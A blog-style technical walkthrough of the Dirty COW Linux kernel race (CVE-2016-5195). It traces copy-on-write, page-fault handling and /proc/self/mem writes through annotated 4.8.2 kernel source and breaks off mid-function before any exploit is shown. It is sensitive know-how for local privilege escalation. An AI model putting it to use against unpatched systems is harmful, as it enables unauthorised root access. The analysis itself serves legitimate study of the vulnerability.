CVE-2016-5195 (Dirty COW) Remake


0x00: Before Everything

Having finished A3👴's kernel Ⅰ and kernel Ⅱ series,

let's see whether some kernel CVEs can be reproduced.

0x01: Information Gathering

NVD - CVE-2016-5195 (nist.gov)

On October 18, 2016, Phil Oester reported the "Dirty COW" 0-day, a bug that had been hiding in the kernel for as long as nine years. The Linux kernel's memory subsystem contains a race condition in its copy-on-write (COW) handling that allows private read-only memory mappings to be corrupted. An attacker who has obtained a low-privileged local account can exploit it to gain write access to otherwise read-only memory mappings and escalate to root.

Dirty COW is exploitable on kernel versions from the 2.x series up through 4.8.2, so it affects an extremely wide range of systems. The bug was ultimately fixed by Linus Torvalds, the creator of Linux, himself.

0x02: Prerequisites

All source code quoted in this article is from kernel version 4.8.2.

COW (copy-on-write)

Copy-on-write (COW) is an optimization technique commonly used when data is shared. While several clients (or threads) share the same data, the data is only copied when one of them tries to modify it, so that the modification does not affect the others.

In the case of fork(), parent and child share the same page frames; only when either side tries to modify the contents of a page frame is a new frame allocated, the old contents copied into it, and the modification applied to the new frame.

  • After fork(), parent and child share all page frames, and all of them are marked read-only
  • When a page frame is about to be modified, the read-only marking triggers a page fault, and only then does the kernel allocate a new frame

The rough flow is shown in the figure below. (Yes, I know my handwriting is ugly :()
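A quick way to see this fork()-style COW from user space is the following small demo (illustrative only, not taken from the original article): the child writes to a heap buffer it shares with the parent, the write is served from a freshly copied page, and the parent still sees the old contents.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

int main(void)
{
    char *buf = malloc(16);
    strcpy(buf, "parent");

    pid_t pid = fork();               /* parent and child now share the page, marked read-only */
    if (pid == 0) {
        strcpy(buf, "child");         /* write faults; the kernel copies the page for the child */
        printf("child  sees: %s\n", buf);
        exit(0);
    }
    wait(NULL);
    printf("parent sees: %s\n", buf); /* still "parent": the child's write never reached us */
    free(buf);
    return 0;
}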

mmap and COW

When we use mmap to map a file into memory as a private mapping, and the underlying file is only readable, writes to that region go through copy-on-write: the kernel copies the file's contents into a private page for the process to modify, so the original file on disk is never affected.
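As a hedged illustration (the file name ./test is a placeholder): a MAP_PRIVATE mapping of a file opened O_RDONLY may itself be PROT_WRITE, and writes to it are COW'd into anonymous pages instead of reaching the file on disk. Dirty COW's whole point, discussed later, is to obtain the same COW write without PROT_WRITE by going through /proc/self/mem.

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>

int main(void)
{
    int fd = open("./test", O_RDONLY);           /* assumes ./test exists and is non-empty */
    char *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE, fd, 0);           /* private mapping: writes are COW'd */

    memcpy(p, "AAA", 3);                          /* triggers COW; only our private copy changes */
    printf("mapping now starts with: %.3s\n", p);

    char orig[4];
    pread(fd, orig, 3, 0);                        /* the on-disk contents are untouched */
    printf("file still starts with:  %.3s\n", orig);

    munmap(p, 4096);
    close(fd);
    return 0;
}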

Page fault

When a page being accessed is not currently in main memory (RAM), or cannot be accessed in the requested way, the CPU raises a page fault. Page faults typically arise from the following situations (a small fault-counter demo follows the list):

  1. Page not in memory: the program accesses a page that has not been loaded into memory yet, either because it was previously resident but has been swapped out to disk, or because it is being touched for the first time.
  2. Illegal access: the program accesses a memory region that was never allocated to it, or one that has already been freed.
  3. Page protection: the program writes to a read-only region, or performs an operation it is not permitted to.
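Minor and major fault counts can be observed from user space with getrusage(); a minimal sketch (the buffer size is arbitrary):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>

static void report(const char *tag)
{
    struct rusage ru;
    getrusage(RUSAGE_SELF, &ru);
    printf("%-12s minor faults: %ld, major faults: %ld\n",
           tag, ru.ru_minflt, ru.ru_majflt);
}

int main(void)
{
    report("before");
    char *p = malloc(1 << 20);
    memset(p, 0x41, 1 << 20);   /* first touch of each new page => minor fault */
    report("after touch");
    free(p);
    return 0;
}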

Handling flow

__do_page_fault()
handle_mm_fault()
__handle_mm_fault()
handle_pte_fault()
do_fault()
do_cow_fault()
do_wp_page()

__do_page_fault

/*
* This routine handles page faults. It determines the address,
* and the problem, and then passes it off to one of the appropriate
* routines.
*
* This function must have noinline because both callers
* {,trace_}do_page_fault() have notrace on. Having this an actual function
* guarantees there's a function trace entry.
*/
static noinline void
__do_page_fault(struct pt_regs *regs, unsigned long error_code,
unsigned long address)
/*struct pt_regs *regs:保存了页面错误发生时的 CPU 寄存器状态。
unsigned long error_code:错误代码,用于指示页面错误的类型。
unsigned long address:引发页面错误的内存地址。*/
{
struct vm_area_struct *vma;
struct task_struct *tsk;
struct mm_struct *mm;
int fault, major = 0;
unsigned int flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;

/*从当前任务结构中获取内存管理结构 mm,并通过该结构找到触发页面故障的地址所属的内存区域 vma*/
tsk = current;
mm = tsk->mm;

/*
* Detect and handle instructions that would cause a page fault for
* both a tracked kernel page and a userspace page.
*/
if (kmemcheck_active(regs))
kmemcheck_hide(regs);
prefetchw(&mm->mmap_sem);

if (unlikely(kmmio_fault(regs, address)))
return;

/*
* We fault-in kernel-space virtual memory on-demand. The
* 'reference' page table is init_mm.pgd.
*
* NOTE! We MUST NOT take any locks for this case. We may
* be in an interrupt or a critical region, and should
* only copy the information from the master page table,
* nothing more.
*
* This verifies that the fault happens in kernel space
* (error_code & 4) == 0, and that the fault was not a
* protection error (error_code & 9) == 0.
*/
if (unlikely(fault_in_kernel_space(address))) { /*检查触发页面故障的地址是否位于内核空间。但这边不太可能发生缺页,所以用unlikely宏优化?*/
if (!(error_code & (PF_RSVD | PF_USER | PF_PROT))) {/*三个标志位:使用了页表项保留的标志位、用户空间页异常、页保护异常,三个标志位都无说明是由内核触发的内核空间的缺页异常*/
if (vmalloc_fault(address) >= 0)
return;

if (kmemcheck_fault(regs, address, error_code))
return;
}

/* Can handle a stale RO->RW TLB: */
if (spurious_fault(error_code, address))
return;

/* kprobes don't want to hook the spurious faults: */
if (kprobes_fault(regs))
return;
/*
* Don't take the mm semaphore here. If we fixup a prefetch
* fault we could otherwise deadlock:
*/
bad_area_nosemaphore(regs, error_code, address, NULL);/*发生了一个不可恢复的页面故障,直接kill*/

return;
}

/* kprobes don't want to hook the spurious faults: */
if (unlikely(kprobes_fault(regs)))
return;

if (unlikely(error_code & PF_RSVD))
pgtable_bad(regs, error_code, address);

if (unlikely(smap_violation(error_code, regs))) {/*smap,直接gg*/
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}

/*
* If we're in an interrupt, have no user context or are running
* in a region with pagefaults disabled then we must not take the fault
*/
if (unlikely(faulthandler_disabled() || !mm)) {
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}

/*
* It's safe to allow irq's after cr2 has been saved and the
* vmalloc fault has been handled.
*
* User-mode registers count as a user access even for any
* potential system fault or CPU buglet:
*/
if (user_mode(regs)) { /*生缺页异常时的寄存器状态为用户态下的*/
local_irq_enable();
error_code |= PF_USER;
flags |= FAULT_FLAG_USER;
} else {
if (regs->flags & X86_EFLAGS_IF)
local_irq_enable();
}

perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);

if (error_code & PF_WRITE)
flags |= FAULT_FLAG_WRITE;
if (error_code & PF_INSTR)
flags |= FAULT_FLAG_INSTRUCTION;

/*
* When running in the kernel we expect faults to occur only to
* addresses in user space. All other faults represent errors in
* the kernel and should generate an OOPS. Unfortunately, in the
* case of an erroneous fault occurring in a code path which already
* holds mmap_sem we will deadlock attempting to validate the fault
* against the address space. Luckily the kernel only validly
* references user space from well defined areas of code, which are
* listed in the exceptions table.
*
* As the vast majority of faults will be valid we will only perform
* the source reference check when there is a possibility of a
* deadlock. Attempt to lock the address space, if we cannot we then
* validate the source. If this is invalid we can skip the address
* space check, thus avoiding the deadlock:
*/
if (unlikely(!down_read_trylock(&mm->mmap_sem))) {
if ((error_code & PF_USER) == 0 &&
!search_exception_tables(regs->ip)) {
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
retry:
down_read(&mm->mmap_sem);
} else {
/*
* The above down_read_trylock() might have succeeded in
* which case we'll have missed the might_sleep() from
* down_read():
*/
might_sleep();
}

vma = find_vma(mm, address);
if (unlikely(!vma)) {
bad_area(regs, error_code, address);
return;
}
if (likely(vma->vm_start <= address))/*检查触发页面故障的地址是否在当前进程的内存映射区域内*/
goto good_area;
if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
bad_area(regs, error_code, address);
return;
}
if (error_code & PF_USER) {/*缺页异常地址位于用户空间*/
/*
* Accessing the stack below %sp is always a bug.
* The large cushion allows instructions like enter
* and pusha to work. ("enter $65535, $31" pushes
* 32 pointers and then decrements %sp by 65535.)
*/
if (unlikely(address + 65536 + 32 * sizeof(unsigned long) < regs->sp)) {
bad_area(regs, error_code, address);
return;
}
}
if (unlikely(expand_stack(vma, address))) {/*调用 expand_stack() 函数尝试扩展栈区*/
bad_area(regs, error_code, address);
return;
}

/*
* Ok, we have a good vm_area for this memory access, so
* we can handle it..
*/
/*运行到这里,说明是正常的缺页异常,addr属于进程的地址空间,此时进行请求调页,分配物理内存*/
good_area:
if (unlikely(access_error(error_code, vma))) {
bad_area_access_error(regs, error_code, address, vma);
return;
}

/*
* If for any reason at all we couldn't handle the fault,
* make sure we exit gracefully rather than endlessly redo
* the fault. Since we never set FAULT_FLAG_RETRY_NOWAIT, if
* we get VM_FAULT_RETRY back, the mmap_sem has been unlocked.
*/
/*核心function*/
fault = handle_mm_fault(vma, address, flags);
major |= fault & VM_FAULT_MAJOR;

/*
* If we need to retry the mmap_sem has already been released,
* and if there is a fatal signal pending there is no guarantee
* that we made any progress. Handle this case first.
*/
if (unlikely(fault & VM_FAULT_RETRY)) {
/* Retry at most once */
if (flags & FAULT_FLAG_ALLOW_RETRY) {
flags &= ~FAULT_FLAG_ALLOW_RETRY;
flags |= FAULT_FLAG_TRIED;
if (!fatal_signal_pending(tsk))
goto retry;
}

/* User mode? Just return to handle the fatal exception */
if (flags & FAULT_FLAG_USER)/*用户态触发用户地址空间缺页异常,交由上层函数处理了*/
return;

/* Not returning to user mode? Handle exceptions or die: */
no_context(regs, error_code, address, SIGBUS, BUS_ADRERR);
return;
}

up_read(&mm->mmap_sem);/*释放内存管理结构的读锁*/
if (unlikely(fault & VM_FAULT_ERROR)) {
mm_fault_error(regs, error_code, address, vma, fault);
return;
}

/*
* Major/minor page fault accounting. If any of the events
* returned VM_FAULT_MAJOR, we account it as a major fault.
*/
if (major) {/*如果页面故障被标记为 Major,则增加任务的 maj_flt 计数器;否则,增加 min_flt 计数器*/
tsk->maj_flt++;
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
} else {
tsk->min_flt++;
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);/*记录页面故障事件,用于性能统计*/
}

check_v8086_mode(regs, address, tsk);
}
NOKPROBE_SYMBOL(__do_page_fault);

The flow as summarized by A3👴:

  • Determine whether the faulting address lies in the user address space or the kernel address space
  • In the kernel address space
    • Fault triggered in kernel mode: handled by vmalloc_fault()
    • Fault triggered in user mode: segmentation fault, send SIGSEGV
  • In the user address space
    • Fault triggered in kernel mode
      • SMAP is enabled: kill the process
      • The process has no address space | page-fault handling is disabled: kill the process
      • Otherwise, continue to the next step
    • Fault triggered in user mode
      • Set the corresponding flags and continue to the next step
    • Check whether it is a write fault; the page may be missing or not writable, set the corresponding flags
    • Find the VMA (linear region) that the linear address belongs to [1]
      • No matching VMA: illegal access
      • A matching VMA exists and the address lies inside the region it describes: continue to the next step
      • A matching VMA exists but the address lies outside the region it describes: it may be on the stack, so try to grow the stack
    • ✳ Call handle_mm_fault(), the core function for handling the page fault
      • On failure, retry (go back to [1]; only one retry is made)
      • Other cleanup

__handle_mm_fault

Surely nobody still doesn't know about 4-level page tables, right?

In Linux, virtual memory management is implemented with multi-level page tables. On x86-64, Linux uses 4-level paging, also called multilevel paging or hierarchical paging.

A 4-level page table is a hierarchy of four levels, each of which translates a different part of the virtual address (a small index-extraction sketch follows the list):

  1. Page Global Directory (PGD): the first level, which turns part of the virtual address into an index into the Page Upper Directory (PUD).
  2. Page Upper Directory (PUD): the second level, which turns part of the virtual address into an index into the Page Middle Directory (PMD).
  3. Page Middle Directory (PMD): the third level, which turns part of the virtual address into an index into the page table (PT).
  4. Page Table Entry (PTE): the fourth level, which finally maps the virtual address to a physical address.
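To make the four levels concrete, here is a small user-space sketch (not kernel code; the example address is arbitrary) that splits an x86-64 virtual address into its four table indices and page offset, assuming the usual 9+9+9+9+12 bit layout:

#include <stdio.h>

/* x86-64 4-level paging: 9 bits per table index, 12-bit page offset */
#define IDX(addr, shift) (((addr) >> (shift)) & 0x1ffUL)

int main(void)
{
    unsigned long addr = 0x00007f1234567abcUL;   /* example virtual address */

    printf("PGD index:   %lu\n", IDX(addr, 39));
    printf("PUD index:   %lu\n", IDX(addr, 30));
    printf("PMD index:   %lu\n", IDX(addr, 21));
    printf("PTE index:   %lu\n", IDX(addr, 12));
    printf("page offset: 0x%lx\n", addr & 0xfffUL);
    return 0;
}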

We also need to be familiar with one more structure:

struct fault_env {
struct vm_area_struct *vma; /* Target VMA */
unsigned long address; /* Faulting virtual address */
unsigned int flags; /* FAULT_FLAG_xxx flags */
pmd_t *pmd; /* Pointer to pmd entry matching
* the 'address'
*/
pte_t *pte; /* Pointer to pte entry matching
* the 'address'. NULL if the page
* table hasn't been allocated.
*/
spinlock_t *ptl; /* Page table lock.
* Protects pte page table if 'pte'
* is not NULL, otherwise pmd.
*/
pgtable_t prealloc_pte; /* Pre-allocated pte page table.
* vm_ops->map_pages() calls
* alloc_set_pte() from atomic context.
* do_fault_around() pre-allocates
* page table to avoid allocation from
* atomic context.
*/
};

static int __handle_mm_fault(struct vm_area_struct *vma, unsigned long address,
unsigned int flags)
{
struct fault_env fe = {//创建一个 fault_env 结构体 fe,其中包含了 vma、address 和 flags 等信息
.vma = vma,
.address = address,
.flags = flags,
};
struct mm_struct *mm = vma->vm_mm;
pgd_t *pgd;//页全局目录项
pud_t *pud;//页上级目录项

pgd = pgd_offset(mm, address);//获取全局页表项
pud = pud_alloc(mm, pgd, address);//获取页上级目录项
if (!pud)//获取页上级目录项失败,gg
return VM_FAULT_OOM;
fe.pmd = pmd_alloc(mm, pud, address);//获取页中级目录项
if (!fe.pmd)//获取页中级目录项失败,gg
return VM_FAULT_OOM;
if (pmd_none(*fe.pmd) && transparent_hugepage_enabled(vma)) {/*页面的页表项为空且透明大页已启用,那么它会调用 create_huge_pmd 函数尝试创建一个大页。这个函数的目的是尝试将多个物理页映射到一个大页上,从而提高内存访问效率。8懂,chat的*/
int ret = create_huge_pmd(&fe);
if (!(ret & VM_FAULT_FALLBACK))/*gg*/
return ret;
} else {
pmd_t orig_pmd = *fe.pmd;
int ret;

barrier();
if (pmd_trans_huge(orig_pmd) || pmd_devmap(orig_pmd)) {
if (pmd_protnone(orig_pmd) && vma_is_accessible(vma))
return do_huge_pmd_numa_page(&fe, orig_pmd);

if ((fe.flags & FAULT_FLAG_WRITE) &&
!pmd_write(orig_pmd)) {
ret = wp_huge_pmd(&fe, orig_pmd);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
huge_pmd_set_accessed(&fe, orig_pmd);
return 0;
}
}
}

return handle_pte_fault(&fe);//进入核心处理函数
}

handle_pte_fault

/*
* These routines also need to handle stuff like marking pages dirty
* and/or accessed for architectures that don't do it in hardware (most
* RISC architectures). The early dirtying is also good on the i386.
*
* There is also a hook called "update_mmu_cache()" that architectures
* with external mmu caches can use to update those (ie the Sparc or
* PowerPC hashed page tables that act as extended TLBs).
*
* We enter with non-exclusive mmap_sem (to exclude vma changes, but allow
* concurrent faults).
*
* The mmap_sem may have been released depending on flags and our return value.
* See filemap_fault() and __lock_page_or_retry().
*/
static int handle_pte_fault(struct fault_env *fe)
{
pte_t entry;

if (unlikely(pmd_none(*fe->pmd))) {//页表指针为空,表示相应的页表项还未分配。在这种情况下,将 fe->pte 设为 NULL
/*
* Leave __pte_alloc() until later: because vm_ops->fault may
* want to allocate huge page, and if we expose page table
* for an instant, it will be difficult to retract from
* concurrent faults and from rmap lookups.
*/
fe->pte = NULL;
} else {
/* See comment in pte_alloc_one_map() */
if (pmd_trans_unstable(fe->pmd) || pmd_devmap(*fe->pmd))
return 0;
/*
* A regular pmd is established and it can't morph into a huge
* pmd from under us anymore at this point because we hold the
* mmap_sem read mode and khugepaged takes it in write mode.
* So now it's safe to run pte_offset_map().
*/
fe->pte = pte_offset_map(fe->pmd, fe->address);//使用 pte_offset_map 函数获取给定虚拟地址的页表项指针,并读取该页表项的内容到 entry 变量中。

entry = *fe->pte;

/*
* some architectures can have larger ptes than wordsize,
* e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and
* CONFIG_32BIT=y, so READ_ONCE or ACCESS_ONCE cannot guarantee
* atomic accesses. The code below just needs a consistent
* view for the ifs and we later double check anyway with the
* ptl lock held. So here a barrier will do.
*/
barrier();
if (pte_none(entry)) {//检查页表项是否为空(指向的物理页框是否存在),如果为空,则释放之前映射的页表项并将 fe->pte 设为空。
pte_unmap(fe->pte);
fe->pte = NULL;
}
}

if (!fe->pte) {//如果 fe->pte 为空,则说明页面不存在,根据 VMA(Virtual Memory Area)是否匿名执行不同的页面处理操作。
if (vma_is_anonymous(fe->vma))
return do_anonymous_page(fe);
else
return do_fault(fe);//分配物理页框
}

if (!pte_present(entry))//如果页面已经交换到磁盘上,则执行交换页面处理操作
return do_swap_page(fe, entry);

if (pte_protnone(entry) && vma_is_accessible(fe->vma))//如果页面是保护的,并且 VMA 是可访问的,则执行 NUMA(Non-Uniform Memory Access)页面处理操作。
return do_numa_page(fe, entry);

fe->ptl = pte_lockptr(fe->vma->vm_mm, fe->pmd);
spin_lock(fe->ptl);//自旋锁
if (unlikely(!pte_same(*fe->pte, entry)))
goto unlock;
if (fe->flags & FAULT_FLAG_WRITE) {//存在 FAULT_FLAG_WRITE 标志位,表示缺页异常由写操作引起
if (!pte_write(entry))//对应的页不可写
return do_wp_page(fe, entry);//进行写时复制,将内容写入由 do_fault()->do_cow_fault()分配的内存页中
entry = pte_mkdirty(entry);
}
entry = pte_mkyoung(entry);//将该页【标脏】
if (ptep_set_access_flags(fe->vma, fe->address, fe->pte, entry,
fe->flags & FAULT_FLAG_WRITE)) {
update_mmu_cache(fe->vma, fe->address, fe->pte);
} else {
/*
* This is needed only for protection faults but the arch code
* is not yet telling us if this is a protection fault or not.
* This still avoids useless tlb flushes for .text page faults
* with threads.
*/
if (fe->flags & FAULT_FLAG_WRITE)
flush_tlb_fix_spurious_fault(fe->vma, fe->address);
}
unlock:
pte_unmap_unlock(fe->pte, fe->ptl);//解自旋锁
return 0;
}

The handling of the first page fault:

  • Check whether the page's page-table entry is empty; if it is, the page has not been mapped to a physical page yet.
  • If the page-table entry is empty, this is probably the process's first access to the page, so a new physical page is allocated (and zero-initialized for anonymous memory).
  • If the page-table entry is not empty, the page may have been swapped out to the swap area and needs to be swapped back in.

The handling of the second page fault:

  • Check whether the page is in main memory; if it is, continue; if not, it may have been swapped out and needs to be swapped back in.
  • If the page is in main memory, check whether the fault was caused by a write.
    • If it is a write fault and the page is not writable, perform copy-on-write; if it is writable, mark the page as modified.
    • Write the new state into the page-table entry.

We can therefore conclude that when a process writes to a memory page for the first time, two page faults are triggered in succession: the first establishes the mapping between the page and a physical page, and the second handles the write to the page now that it is in main memory.

do_fault

static int do_fault(struct fault_env *fe)
{
struct vm_area_struct *vma = fe->vma;//获取了指向当前虚拟内存区域(Virtual Memory Area,VMA)的指针 vma
pgoff_t pgoff = linear_page_index(vma, fe->address);//计算页面偏移量,该将线性地址转换为页面偏移量

/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
if (!vma->vm_ops->fault)//检查了 vma 对象是否具有有效的 fault 操作。如果 vma 对象中的 vm_ops 结构中的 fault 函数指针为空,说明该虚拟内存区域可能未完全初始化或者缺少 VM_DONTEXPAND 标志。在这种情况下,函数返回 VM_FAULT_SIGBUS,表示发生了总线错误。
return VM_FAULT_SIGBUS;
if (!(fe->flags & FAULT_FLAG_WRITE))//如果页面错误不是写操作,则调用 do_read_fault 函数处理读取操作。
return do_read_fault(fe, pgoff);
if (!(vma->vm_flags & VM_SHARED))//如果虚拟内存区域的标志中不包含 VM_SHARED 标志,说明该区域是私有的,函数调用 do_cow_fault 函数处理写时复制错误(Copy-On-Write Fault)。
return do_cow_fault(fe, pgoff);
return do_shared_fault(fe, pgoff);//虚拟内存区域是共享的,函数调用 do_shared_fault 函数处理共享错误
}

Handling copy-on-write (no page present yet): do_cow_fault()

This article focuses on the copy-on-write path; in the COW flow, the page fault triggered by the first write eventually ends up being handled in do_cow_fault().

static int do_cow_fault(struct fault_env *fe, pgoff_t pgoff)
{
struct vm_area_struct *vma = fe->vma;
struct page *fault_page, *new_page;
void *fault_entry;
struct mem_cgroup *memcg;
int ret;

if (unlikely(anon_vma_prepare(vma)))
return VM_FAULT_OOM;

new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, fe->address);//为当前进程分配一个新的页面
if (!new_page)
return VM_FAULT_OOM;

if (mem_cgroup_try_charge(new_page, vma->vm_mm, GFP_KERNEL,//为新页面分配内存资源
&memcg, false)) {
put_page(new_page);
return VM_FAULT_OOM;
}

ret = __do_fault(fe, pgoff, new_page, &fault_page, &fault_entry);//读取文件内容到fault_page
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;

if (!(ret & VM_FAULT_DAX_LOCKED))
copy_user_highpage(new_page, fault_page, fe->address, vma);//拷贝fault_page内容到new_page
__SetPageUptodate(new_page);

ret |= alloc_set_pte(fe, memcg, new_page);//设置pte,置换该进程中的pte表项,对于写操作会将该页标脏(该函数会调用maybe_mkwrite()函数,其会调用pte_mkdirty()函数标脏该页)
if (fe->pte)
pte_unmap_unlock(fe->pte, fe->ptl);
if (!(ret & VM_FAULT_DAX_LOCKED)) {//释放fault_page
unlock_page(fault_page);
put_page(fault_page);
} else {
dax_unlock_mapping_entry(vma->vm_file->f_mapping, pgoff);
}
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;
return ret;
uncharge_out:
mem_cgroup_cancel_charge(new_page, memcg, false);
put_page(new_page);
return ret;
}

Handling copy-on-write (page already present): do_wp_page()

Once a page has been obtained via do_fault(), the second page fault is eventually handed over to do_wp_page().

/*
* This routine handles present pages, when users try to write
* to a shared page. It is done by copying the page to a new address
* and decrementing the shared-page counter for the old page.
*
* Note that this routine assumes that the protection checks have been
* done by the caller (the low-level page fault routine in most cases).
* Thus we can safely just mark it writable once we've done any necessary
* COW.
*
* We also mark the page dirty at this point even though the page will
* change only once the write actually happens. This avoids a few races,
* and potentially makes it more efficient.
*
* We enter with non-exclusive mmap_sem (to exclude vma changes,
* but allow concurrent faults), with pte both mapped and locked.
* We return with mmap_sem still held, but pte unmapped and unlocked.
*/
static int do_wp_page(struct fault_env *fe, pte_t orig_pte)
__releases(fe->ptl)
{
struct vm_area_struct *vma = fe->vma;//原有的页
struct page *old_page;

old_page = vm_normal_page(vma, fe->address, orig_pte);//获取缺页的线性地址对应的struct page结构,对于一些特殊映射的页面(如页面回收、页迁移和KSM等),内核并不希望这些页参与到内存管理的一些流程当中,称之为 special mapping,并无对应的struct page结构体
if (!old_page) {//NULL,说明是一个 special mapping 页面;否则说明是normal mapping页面
/*
* VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
* VM_PFNMAP VMA.
*
* We should not cow pages in a shared writeable mapping.
* Just mark the pages writable and/or call ops->pfn_mkwrite.
*/
if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))
return wp_pfn_shared(fe, orig_pte);

pte_unmap_unlock(fe->pte, fe->ptl);
return wp_page_copy(fe, orig_pte, old_page);
}

/*
* Take out anonymous pages first, anonymous shared vmas are
* not dirty accountable.
*/
//先处理匿名页面
if (PageAnon(old_page) && !PageKsm(old_page)) {//原页面为匿名页面 && 不是ksm页面
int total_mapcount;
if (!trylock_page(old_page)) {//多线程相关操作,判断是否有其他线程的竞争
get_page(old_page);
pte_unmap_unlock(fe->pte, fe->ptl);
lock_page(old_page);
fe->pte = pte_offset_map_lock(vma->vm_mm, fe->pmd,
fe->address, &fe->ptl);
if (!pte_same(*fe->pte, orig_pte)) {
unlock_page(old_page);
pte_unmap_unlock(fe->pte, fe->ptl);
put_page(old_page);
return 0;
}
put_page(old_page);
}
//此时没有其他线程与本线程竞争了,调用 reuse_swap_page() 判断使用该页的是否只有一个进程,若是的话就直接重用该页
if (reuse_swap_page(old_page, &total_mapcount)) {
if (total_mapcount == 1) {
/*
* The page is all ours. Move it to
* our anon_vma so the rmap code will
* not search our parent or siblings.
* Protected against the rmap code by
* the page lock.
*/
page_move_anon_rmap(old_page, vma);
}
unlock_page(old_page);
return wp_page_reuse(fe, orig_pte, old_page, 0, 0);
}
unlock_page(old_page);
} else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))) {
return wp_page_shared(fe, orig_pte, old_page);
}

/*
* Ok, we need to copy. Oh, well..
*/
//实在没法重用了,进行写时复制
get_page(old_page);

pte_unmap_unlock(fe->pte, fe->ptl);
return wp_page_copy(fe, orig_pte, old_page);
}

COW and the page-fault flow

The execution flow of write

First, let's look at the execution flow of the write system call.

sys_write

SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
size_t, count)
{
struct fd f = fdget_pos(fd);//根据fd找到对应的文件对象和标志
ssize_t ret = -EBADF;

if (f.file) {
loff_t pos = file_pos_read(f.file); //读取文件对象的位置指针
ret = vfs_write(f.file, buf, count, &pos); //通过虚拟文件系统文件的写操作
if (ret >= 0)
file_pos_write(f.file, pos); //设置文件对象的位置指针
fdput_pos(f); //释放这个对象的引用
}

return ret;
}
sys_write()
vfs_write()
__vfs_write()
file->f_op->write() // this file's file_operations structure in the kernel is like a function table storing the default handler pointers for various system calls

/proc/self/mem: bypassing page-table-entry permissions

Dirty COW usually performs its out-of-permission write through /proc/self/mem; this is the core of the whole exploit.

For the /proc/self/mem file object, writes are dispatched to mem_write().

mem_write()

static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

mem_write() calls mem_rw().

mem_rw()

static ssize_t mem_rw(struct file *file, //要读/写的文件
char __user *buf, //用户空间缓冲区
size_t count, //读/写长度
loff_t *ppos, //开始的地方
int write) //读/写
{
//根据/proc/self/mem这个文件对象的私有数据区域, 找到其映射的是哪一个虚拟地址空间, 然后在内核中申请了一个临时页作为内核缓冲区
struct mm_struct *mm = file->private_data; //mem文件的私有数据区域指向对应的虚拟内存空间
unsigned long addr = *ppos; //偏移,mm中要读写的地址
ssize_t copied;
char *page;

if (!mm)
return 0;

page = (char *)__get_free_page(GFP_TEMPORARY); //获取一个临时页,sys_write限制最多写一页
if (!page)
return -ENOMEM;

copied = 0;
if (!atomic_inc_not_zero(&mm->mm_users)) //增加一个引用
goto free;
//通过一个循环写入count长数据, copy_from_user把数据搬运到内核缓冲区中, 再调用access_remote_vm()写入虚拟地址空间中
while (count > 0) {//count表示剩余要写入的长度
int this_len = min_t(int, count, PAGE_SIZE); //本次写入多少
//把data从用户空间buf复制到内核的临时页
if (write && copy_from_user(page, buf, this_len)) {
copied = -EFAULT;
break;
}
//读写别人的虚拟地址空间
this_len = access_remote_vm(mm, addr, page, this_len, write);
if (!this_len) {
if (!copied)
copied = -EIO;
break;
}
//读取,把内核读到的数据复制到用户buf
if (!write && copy_to_user(buf, page, this_len)) {
copied = -EFAULT;
break;
}

buf += this_len; // 用户缓冲区
addr += this_len; //读写地址
copied += this_len; //读写了多少字节
count -= this_len; //还剩多少字节
}
*ppos = addr;

mmput(mm);
free:
free_page((unsigned long) page);
return copied;
}

access_remote_vm() is a thin wrapper around __access_remote_vm().

int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, int write)
{
return __access_remote_vm(NULL, mm, addr, buf, len, write);
}

__access_remote_vm()

/*
* Access another process' address space as given in mm. If non-NULL, use the
* given task for page fault accounting.
*/
//访问mm指向的其他进程的地址空间,如果tsk非NULL,则用来进行缺页异常计数
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, int write)
{
struct vm_area_struct *vma;
void *old_buf = buf;

down_read(&mm->mmap_sem);//获取mmap_sem信号量
/* ignore errors, just check how much was successfully transferred */
while (len) {//循环,直到写入len长度
int bytes, ret, offset;
void *maddr;
struct page *page = NULL;
//把要访问的其他进程的页面锁定在内存中,避免缺页异常,这里只获取1页,page就是锁定的那一页
ret = get_user_pages_remote(tsk, mm, addr, 1,
write, 1, &page, &vma);
if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
break;
#else
/*
* Check if this is a VM_IO | VM_PFNMAP VMA, which
* we can access using slightly different code.
*/
vma = find_vma(mm, addr);
if (!vma || vma->vm_start > addr)
break;
if (vma->vm_ops && vma->vm_ops->access)
ret = vma->vm_ops->access(vma, addr, buf,
len, write);
if (ret <= 0)
break;
bytes = ret;
#endif
} else {
bytes = len; //要写入的长度
offset = addr & (PAGE_SIZE-1); //addr的页内偏移
/*
bytes+offset <= PAGE_SIZE
=>写入长度+页内偏移<=PAGE_SIZE
=>锁定是页为单位的,因此不能跨页写入
*/
if (bytes > PAGE_SIZE-offset)
